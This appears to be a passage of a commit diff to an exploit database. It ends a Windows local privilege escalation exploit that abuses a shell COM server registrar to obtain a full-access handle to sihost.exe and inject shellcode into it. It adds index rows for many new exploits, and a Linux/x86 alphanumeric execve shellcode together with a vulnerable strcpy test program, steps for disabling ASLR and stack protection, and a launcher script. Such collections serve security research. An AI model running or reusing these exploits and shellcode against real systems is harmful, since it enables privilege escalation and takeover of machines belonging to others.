+// .rdata:0000000000014108   dw 442Fh                                      ; Data3
+// .rdata:0000000000014108   db 0B9h, 0A3h, 86h, 83h, 70h, 61h, 0E2h, 0FBh ; Data4
+const GUID CLSID_CoreShellComServerRegistrar = {
+    0x54e14197, 0x88b0, 0x442f, {
+        0xb9, 0xa3, 0x86, 0x83, 0x70, 0x61, 0xe2, 0xfb
+}};
+
+// 27EB33A5-77F9-4AFE-AE056-FDBBE720EE7
+// .rdata:00000000000140B8 GuidICOMServerRegistrar dd 27EB33A5h          ; Data1
+// .rdata:00000000000140B8   dw 77F9h                                    ; Data2
+// .rdata:00000000000140B8   dw 4AFEh                                    ; Data3
+// .rdata:00000000000140B8   db 0AEh, 5, 6Fh, 0DBh, 0BEh, 72h, 0Eh, 0E7h ; Data4
+MIDL_INTERFACE("27EB33A5-77F9-4AFE-AE05-6FDBBE720EE7")
+ICoreShellComServerRegistrar : public IUnknown {
+    // 0:015> dqs 00007ff8`3fe526e8
+    // [...]
+    // 00007ff8`3fe52730  00007ff8`3fe4a5e0 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl<Microsoft::WRL::RuntimeClassFlags<2>,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::QueryInterface
+    // 00007ff8`3fe52738  00007ff8`3fe4a6d0 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl<Microsoft::WRL::RuntimeClassFlags<2>,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::AddRef
+    // 00007ff8`3fe52740  00007ff8`3fe4a680 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl<Microsoft::WRL::RuntimeClassFlags<2>,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::Release
+    // 00007ff8`3fe52748  00007ff8`3fe47260 CoreShellExtFramework!CoreShellComServerRegistrar::RegisterCOMServer
+    // 00007ff8`3fe52750  00007ff8`3fe476b0 CoreShellExtFramework!CoreShellComServerRegistrar::UnregisterCOMServer
+    // 00007ff8`3fe52758  00007ff8`3fe477f0 CoreShellExtFramework!CoreShellComServerRegistrar::DuplicateHandle
+    // 00007ff8`3fe52760  00007ff8`3fe47920 CoreShellExtFramework!CoreShellComServerRegistrar::OpenProcess
+    virtual HRESULT STDMETHODCALLTYPE RegisterCOMServer() = 0;
+    virtual HRESULT STDMETHODCALLTYPE UnregisterCOMServer() = 0;
+    virtual HRESULT STDMETHODCALLTYPE DuplicateHandle() = 0;
+    virtual HRESULT STDMETHODCALLTYPE OpenProcess(
+        const uint32_t DesiredAccess,
+        const bool InheritHandle,
+        const uint32_t ArbitraryPid,
+        const uint32_t TargetProcessId,
+        HANDLE *ProcessHandle
+    ) = 0;
+};
+
+struct Marshalled_t {
+    uint32_t Meow;
+    uint32_t ObjRefType;
+    GUID IfaceId;
+    uint32_t Flags;
+    uint32_t References;
+    uint64_t Oxid;
+    uint64_t Oid;
+    union {
+        uint64_t IfacePointerIdLow;
+        struct {
+            uint64_t _Dummy1 : 32;
+            uint64_t ServerPid : 16;
+        };
+    };
+
+    uint64_t IfacePointerIdHigh;
+};
+
+int main() {
+
+    //
+    // Initialize COM.
+    //
+
+    HRESULT Hr = CoInitialize(nullptr);
+    if(FAILED(Hr)) {
+        printf("Failed to initialize COM.\nThis might be the best thing that happened in your life, carry on and never look back.");
+        return EXIT_FAILURE;
+    }
+
+    //
+    // Instantiate an out-of-proc instance of `ICoreShellComServerRegistrar`.
+    //
+
+    CComPtr<ICoreShellComServerRegistrar> ComServerRegistrar;
+    Hr = ComServerRegistrar.CoCreateInstance(
+        CLSID_CoreShellComServerRegistrar,
+        nullptr,
+        CLSCTX_LOCAL_SERVER
+    );
+
+    if(FAILED(Hr)) {
+        printf("You are probably not vulnerable (%08x) bailing out.", Hr);
+        return EXIT_FAILURE;
+    }
+
+    //
+    // We don't use the copy ctor here to avoid leaking the object as the returned
+    // stream already has its refcount bumped by `SHCreateMemStream`.
+    //
+
+    CComPtr<IStream> Stream;
+    Stream.Attach(SHCreateMemStream(nullptr, 0));
+
+    //
+    // Get the marshalled data for the `ICoreShellComServerRegistrar` interface, so
+    // that we can extract the PID of the COM server (sihost.exe) in this case.
+    // https://twitter.com/tiraniddo/status/1208073552282488833
+    //
+
+    Hr = CoMarshalInterface(
+        Stream,
+        __uuidof(ICoreShellComServerRegistrar),
+        ComServerRegistrar,
+        MSHCTX_LOCAL,
+        nullptr,
+        MSHLFLAGS_NORMAL
+    );
+
+    if(FAILED(Hr)) {
+        printf("Failed to marshal the interface (%08x) bailing out.", Hr);
+        return EXIT_FAILURE;
+    }
+
+    //
+    // Read the PID out of the blob now.
+    //
+
+    const LARGE_INTEGER Origin {};
+    Hr = Stream->Seek(Origin, STREAM_SEEK_SET, nullptr);
+
+    uint8_t Buffer[0x1000] {};
+    Hr = Stream->Read(Buffer, sizeof(Buffer), nullptr);
+
+    union {
+        Marshalled_t *Blob;
+        void *Raw;
+    } Ptr;
+
+    Ptr.Raw = Buffer;
+    const uint32_t SihostPid = Ptr.Blob->ServerPid;
+
+    //
+    // Ready to get a `PROCESS_ALL_ACCESS` handle to the server now!
+    //
+
+    HANDLE ProcessHandle;
+    Hr = ComServerRegistrar->OpenProcess(
+        PROCESS_ALL_ACCESS,
+        false,
+        SihostPid,
+        GetCurrentProcessId(),
+        &ProcessHandle
+    );
+
+    if(FAILED(Hr)) {
+        printf("Failed to OpenProcess (%08x) bailing out.", Hr);
+        return EXIT_FAILURE;
+    }
+
+    //
+    // Allocate executable memory in the target.
+    //
+
+    const auto ShellcodeAddress = LPTHREAD_START_ROUTINE(VirtualAllocEx(
+        ProcessHandle,
+        nullptr,
+        0x1000,
+        MEM_COMMIT | MEM_RESERVE,
+        PAGE_EXECUTE_READWRITE
+    ));
+
+    if(ShellcodeAddress == nullptr) {
+        printf("Failed to VirtualAllocEx memory in the target process (%d) bailing out.", GetLastError());
+        return EXIT_FAILURE;
+    }
+
+    //
+    // This is a CreateProcess(calc) shellcode generated with scc, see payload.cc.
+    //
+
+    const uint8_t Shellcode[] {
+        0x48, 0x83, 0xc4, 0x08, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83, 0xec, 0x08, 0x55, 0x48, 0x8b, 0xec,
+        0x48, 0x8d, 0x64, 0x24, 0xf0, 0x48, 0x8d, 0x05, 0x42, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0,
+        0x6a, 0x00, 0x8f, 0x45, 0xf8, 0x48, 0x8d, 0x05, 0x3a, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x08, 0x48,
+        0x8d, 0x55, 0xf0, 0xe8, 0x63, 0x01, 0x00, 0x00, 0xe8, 0xbf, 0x01, 0x00, 0x00, 0xc9, 0xc3, 0x53,
+        0x56, 0x57, 0x41, 0x54, 0x55, 0x48, 0x8b, 0xec, 0x6a, 0x60, 0x58, 0x65, 0x48, 0x8b, 0x00, 0x48,
+        0x8b, 0x40, 0x18, 0x48, 0x8b, 0x70, 0x10, 0x48, 0x8b, 0x46, 0x30, 0x48, 0x83, 0xf8, 0x00, 0x74,
+        0x13, 0xeb, 0x08, 0x4c, 0x8b, 0x06, 0x49, 0x8b, 0xf0, 0xeb, 0xec, 0x45, 0x33, 0xdb, 0x66, 0x45,
+        0x33, 0xd2, 0xeb, 0x09, 0x33, 0xc0, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x66, 0x8b, 0x46,
+        0x58, 0x66, 0x44, 0x3b, 0xd0, 0x72, 0x11, 0xeb, 0x3c, 0x66, 0x45, 0x8b, 0xc2, 0x66, 0x41, 0x83,
+        0xc0, 0x02, 0x66, 0x45, 0x8b, 0xd0, 0xeb, 0xe5, 0x45, 0x8b, 0xcb, 0x41, 0xc1, 0xe9, 0x0d, 0x41,
+        0x8b, 0xc3, 0xc1, 0xe0, 0x13, 0x44, 0x0b, 0xc8, 0x41, 0x8b, 0xc1, 0x4c, 0x8b, 0x46, 0x60, 0x45,
+        0x0f, 0xb7, 0xca, 0x4d, 0x03, 0xc1, 0x45, 0x8a, 0x00, 0x45, 0x0f, 0xbe, 0xc0, 0x41, 0x83, 0xf8,
+        0x61, 0x72, 0x15, 0xeb, 0x07, 0x41, 0x3b, 0xcb, 0x74, 0x16, 0xeb, 0x97, 0x41, 0x83, 0xe8, 0x20,
+        0x41, 0x03, 0xc0, 0x44, 0x8b, 0xd8, 0xeb, 0xb1, 0x41, 0x03, 0xc0, 0x44, 0x8b, 0xd8, 0xeb, 0xa9,
+        0x4c, 0x8b, 0x56, 0x30, 0x41, 0x8b, 0x42, 0x3c, 0x4d, 0x8b, 0xe2, 0x4c, 0x03, 0xe0, 0x41, 0x8b,
+        0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x4d, 0x8b, 0xca, 0x4c, 0x03, 0xc8, 0x45, 0x33, 0xdb, 0x41,
+        0x8b, 0x41, 0x18, 0x44, 0x3b, 0xd8, 0x72, 0x0b, 0xe9, 0x56, 0xff, 0xff, 0xff, 0x41, 0x83, 0xc3,
+        0x01, 0xeb, 0xec, 0x41, 0x8b, 0x41, 0x20, 0x49, 0x8b, 0xda, 0x48, 0x03, 0xd8, 0x45, 0x8b, 0xc3,
+        0x48, 0x8b, 0xc3, 0x4a, 0x8d, 0x04, 0x80, 0x8b, 0x00, 0x49, 0x8b, 0xfa, 0x48, 0x03, 0xf8, 0x33,
+        0xc0, 0x48, 0x8b, 0xdf, 0x48, 0x83, 0xc7, 0x01, 0x44, 0x8a, 0x03, 0x41, 0x0f, 0xbe, 0xd8, 0x83,
+        0xfb, 0x00, 0x74, 0x02, 0xeb, 0x06, 0x3b, 0xd0, 0x74, 0x17, 0xeb, 0xc1, 0x44, 0x8b, 0xc0, 0x41,
+        0xc1, 0xe8, 0x0d, 0xc1, 0xe0, 0x13, 0x44, 0x0b, 0xc0, 0x44, 0x03, 0xc3, 0x41, 0x8b, 0xc0, 0xeb,
+        0xd0, 0x41, 0x8b, 0x41, 0x1c, 0x49, 0x8b, 0xd2, 0x48, 0x03, 0xd0, 0x41, 0x8b, 0x41, 0x24, 0x4d,
+        0x8b, 0xca, 0x4c, 0x03, 0xc8, 0x45, 0x8b, 0xc3, 0x49, 0x8b, 0xc1, 0x4a, 0x8d, 0x04, 0x40, 0x66,
+        0x8b, 0x00, 0x0f, 0xb7, 0xc8, 0x48, 0x8b, 0xc2, 0x48, 0x8d, 0x04, 0x88, 0x8b, 0x00, 0x4c, 0x03,
+        0xd0, 0x49, 0x8b, 0xc2, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x53, 0x56, 0x57, 0x41, 0x54,
+        0x55, 0x48, 0x8b, 0xec, 0x48, 0x8b, 0xf1, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0x03, 0x48, 0x83, 0xf8,
+        0x00, 0x74, 0x0e, 0x48, 0x8b, 0xc6, 0x48, 0x83, 0xc6, 0x04, 0x44, 0x8b, 0x20, 0x33, 0xff, 0xeb,
+        0x07, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x8b, 0x06, 0x41, 0x8b, 0xcc, 0x8b, 0xd0, 0xe8,
+        0x6b, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0xd0, 0x48, 0x83, 0xfa, 0x00, 0x74, 0x02, 0xeb, 0x06, 0x48,
+        0x83, 0xc3, 0x08, 0xeb, 0xc5, 0x48, 0x8b, 0x03, 0x48, 0x8b, 0xcf, 0x48, 0x83, 0xc7, 0x01, 0x48,
+        0x8d, 0x04, 0xc8, 0x48, 0x89, 0x10, 0x48, 0x83, 0xc6, 0x04, 0xeb, 0xcc, 0x57, 0x55, 0x48, 0x8b,
+        0xec, 0x48, 0x8d, 0xa4, 0x24, 0x78, 0xff, 0xff, 0xff, 0x48, 0x8d, 0xbd, 0x78, 0xff, 0xff, 0xff,
+        0x32, 0xc0, 0x6a, 0x68, 0x59, 0xf3, 0xaa, 0xc7, 0x85, 0x78, 0xff, 0xff, 0xff, 0x68, 0x00, 0x00,
+        0x00, 0x48, 0x8d, 0x05, 0x4a, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x10, 0x4c, 0x8d, 0x95, 0x78, 0xff,
+        0xff, 0xff, 0x48, 0x8d, 0x45, 0xe0, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x45, 0x33, 0xc9, 0x50, 0x41,
+        0x52, 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0x00, 0x48, 0x8d, 0x64, 0x24, 0xe0, 0x48, 0x8d,
+        0x05, 0x09, 0x00, 0x00, 0x00, 0xff, 0x10, 0x48, 0x83, 0xc4, 0x50, 0xc9, 0x5f, 0xc3, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x17, 0xca, 0x2b, 0x6e, 0x72, 0xfe, 0xb3, 0x16, 0x00, 0x00,
+        0x00, 0x00, 0x63, 0x61, 0x6c, 0x63, 0x00
+    };
+
+    if(!WriteProcessMemory(
+        ProcessHandle,
+        ShellcodeAddress,
+        Shellcode,
+        sizeof(Shellcode),
+        nullptr
+    )) {
+        printf("Failed to WriteProcessMemory in the target process (%d) bailing out.", GetLastError());
+
+        //
+        // At least clean up the remote process D:
+        //
+
+        VirtualFreeEx(ProcessHandle, ShellcodeAddress, 0, MEM_RELEASE);
+        return EXIT_FAILURE;
+    }
+
+    //
+    // Creating a remote thread on the shellcode now.
+    //
+
+    DWORD ThreadId;
+    HANDLE ThreadHandle = CreateRemoteThread(
+        ProcessHandle,
+        nullptr,
+        0,
+        ShellcodeAddress,
+        nullptr,
+        0,
+        &ThreadId
+    );
+
+    //
+    // Waiting for the thread to end..
+    //
+
+    WaitForSingleObject(ThreadHandle, INFINITE);
+
+    //
+    // All right, we are done here, let's clean up and exit.
+    //
+
+    VirtualFreeEx(ProcessHandle, ShellcodeAddress, 0, MEM_RELEASE);
+    printf("Payload has been successfully injected in %d.", SihostPid);
+    return EXIT_SUCCESS;
+}

files_exploits.csv

@@ -6627,6 +6627,26 @@ id,file,description,date,author,type,platform,port
 47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 -  'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
 47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,
 47839,exploits/windows/dos/47839.py,"MSN Password Recovery 1.30 - Denial of Service (PoC)",2020-01-02,Gokkulraj,dos,windows,
+47848,exploits/windows/dos/47848.py,"NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service",2020-01-06,"Ismail Tasdelen",dos,windows,
+47853,exploits/windows/dos/47853.py,"NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47855,exploits/windows/dos/47855.py,"SpotIE 2.9.5 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47856,exploits/windows/dos/47856.py,"Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47857,exploits/windows/dos/47857.py,"BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47859,exploits/windows/dos/47859.py,"ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47860,exploits/windows/dos/47860.py,"NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47861,exploits/windows/dos/47861.py,"Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47862,exploits/windows/dos/47862.py,"TextCrawler Pro3.1.1 - Denial of Service (PoC)",2020-01-06,stresser,dos,windows,
+47863,exploits/windows/dos/47863.py,"RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47864,exploits/windows/dos/47864.py,"Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47865,exploits/windows/dos/47865.py,"RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47866,exploits/windows/dos/47866.py,"NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47867,exploits/windows/dos/47867.py,"Office Product Key Finder 1.5.4 - Denial of Service (PoC)",2020-01-06,Gokkulraj,dos,windows,
+47868,exploits/windows/dos/47868.py,"SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47869,exploits/windows/dos/47869.py,"SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47870,exploits/windows/dos/47870.py,"SpotIM 2.2 - 'Name' Denial Of Service",2020-01-06,"Ismail Tasdelen",dos,windows,
+47871,exploits/windows/dos/47871.txt,"FTPGetter Professional 5.97.0.223 -  Denial of Service (PoC)",2020-01-06,FULLSHADE,dos,windows,
+47873,exploits/windows/dos/47873.py,"Duplicate Cleaner Pro 4 - Denial of Service (PoC)",2020-01-06,stresser,dos,windows,
+47878,exploits/windows/dos/47878.txt,"Microsoft Outlook VCF cards - Denial of Service (PoC)",2020-01-06,hyp3rlinx,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10862,6 +10882,8 @@ id,file,description,date,author,type,platform,port
 47830,exploits/freebsd/local/47830.sh,"FreeBSD-SA-19:15.mqueuefs - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd,
 47838,exploits/windows/local/47838.txt,"Microsoft Windows .Group File - Code Execution",2020-01-01,hyp3rlinx,local,windows,
 47845,exploits/windows/local/47845.txt,"Plantronics Hub 3.13.2 - Local Privilege Escalation",2020-01-03,Markus,local,windows,
+47852,exploits/windows/local/47852.txt,"Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path",2020-01-06,ZwX,local,windows,
+47880,exploits/windows/local/47880.cc,"Windows - Shell COM Server Registrar Local Privilege Escalation",2020-01-02,0vercl0k,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42150,3 +42172,13 @@ id,file,description,date,author,type,platform,port
 47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,
 47843,exploits/php/webapps/47843.txt,"Online Course Registration 2.0 - Remote Code Execution",2020-01-03,"Metin Yunus Kandemir",webapps,php,
 47844,exploits/php/webapps/47844.txt,"Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection",2020-01-03,"Hakan TAŞKÖPRÜ",webapps,php,
+47846,exploits/php/webapps/47846.txt,"Dairy Farm Shop Management System 1.0 - 'username' SQL Injection",2020-01-06,"Chris Inzinga",webapps,php,
+47847,exploits/php/webapps/47847.txt,"Complaint Management System 4.0 - 'cid' SQL injection",2020-01-06,FULLSHADE,webapps,php,
+47850,exploits/hardware/webapps/47850.txt,"IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting",2020-01-06,"Ismail Tasdelen",webapps,hardware,
+47851,exploits/php/webapps/47851.txt,"Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)",2020-01-06,"Ismail Tasdelen",webapps,php,
+47854,exploits/php/webapps/47854.txt,"Hostel Management System 2.0 - 'id' SQL Injection",2020-01-06,FULLSHADE,webapps,php,
+47858,exploits/php/webapps/47858.txt,"elaniin CMS 1.0 - Authentication Bypass",2020-01-06,riamloo,webapps,php,
+47874,exploits/php/webapps/47874.txt,"Small CRM 2.0 - Authentication Bypass",2020-01-06,FULLSHADE,webapps,php,
+47875,exploits/php/webapps/47875.txt,"Voyager 1.3.0 - Directory Traversal",2020-01-06,NgoAnhDuc,webapps,php,
+47876,exploits/php/webapps/47876.txt,"Codoforum 4.8.3 - Persistent Cross-Site Scripting",2020-01-06,Prasanth,webapps,php,
+47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,

files_shellcodes.csv

@@ -1010,3 +1010,4 @@ id,file,description,date,author,type,platform
 47530,shellcodes/linux/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux
 47564,shellcodes/linux/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux
 47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
+47877,shellcodes/linux/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux

shellcodes/linux/47877.c

@@ -0,0 +1,109 @@
+# Title: Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
+# Date: 2019-12-31
+# Shellcode Author: bolonobolo
+# Tested on: Linux x86
+
+######################## execve.asm ###############################
+global _start			
+
+section .text
+_start:
+
+       ; int 0x80 ------------
+       push 0x30
+       pop eax
+       xor al, 0x30
+       push eax
+       pop edx
+       dec eax
+       xor ax, 0x4f73
+       xor ax, 0x3041
+       push eax
+       push edx
+       pop eax
+       ;----------------------
+       push edx
+       push 0x68735858
+       pop eax
+       xor ax, 0x7777
+       push eax
+       push 0x30
+       pop eax
+       xor al, 0x30
+       xor eax, 0x6e696230
+       dec eax
+       push eax
+
+       ; pushad/popad to place /bin/sh in EBX register
+       push esp
+       pop eax
+       push edx
+       push ecx
+       push ebx
+       push eax
+       push esp
+       push ebp
+       push esi
+       push edi
+       popad
+       push eax
+       pop ecx
+       push ebx
+
+       xor al, 0x4a
+       xor al, 0x41
+
+######################## ASCII string ##########################
+
+j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A
+
+########################## bof.c ####################
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+  int main(int argc, char *argv[]){
+    char buffer[128];
+    strcpy(buffer,  argv[1]);
+    return 0;
+  }
+
+
+When you test it on new kernels remember to disable the
+randomize_va_space and to compile the C program with execstack enabled
+and the stack protector disabled
+
+# bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
+# sysctl -p
+# gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g
+bof.c -o bof
+
+
+###################################################################
+
+./bof `perl -e 'print "\x90"x48 .
+"j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A" .
+"D"x16 . "\xff\xe4" . "\x79\xf7\xff\xbf"'`
+
+The \x79\xf7\xff\xbf may change, you must find yourself an address in
+the NOP befor the shellcode
+
+#################### alpha.py ############################
+
+#!/usr/bin/python
+import os
+
+print "[*] Loading NOP"
+z = "\x90"*48
+print "[*] Loading alphanumeric"
+z += "j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A"
+print "[*] Loading syscall"
+z += "D"*16
+print "[*] Loading JMP and landing address"
+z += "\xff\xe4\x79\xf7\xff\xbf"
+print "[*] Popping the shell..."
+os.system("./bof " + z)
+
+
+##################################################################